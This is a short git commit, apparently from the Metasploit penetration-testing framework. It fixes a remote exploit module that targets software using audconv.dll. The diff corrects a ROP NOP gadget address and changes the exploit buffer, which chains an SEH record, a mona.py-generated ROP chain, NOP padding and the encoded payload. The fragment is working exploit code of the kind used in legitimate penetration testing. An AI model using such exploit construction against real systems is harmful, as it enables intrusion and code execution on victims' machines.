Fix ROP NOP address and reduce/remove NOPs

bug/bundler_fix
sgabe 2014-02-11 00:29:37 +01:00
parent 08b6f74fb4
commit e8a3984c85
1 changed files with 3 additions and 3 deletions

View File

@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop_nop =
[
0x1003d55c # RETN (ROP NOP) [audconv.dll]
0x1003d55d # RETN (ROP NOP) [audconv.dll]
].flatten.pack('V*')
# ROP chain generated by mona.py - See corelan.be
@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << generate_seh_record(target.ret)
sploit << rand_text_alpha_upper(80)
sploit << rop_nop
sploit << make_nops(8)
sploit << rand_text_alpha_upper(4)
sploit << rop_gadgets
sploit << make_nops(16)
sploit << make_nops(4)
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000)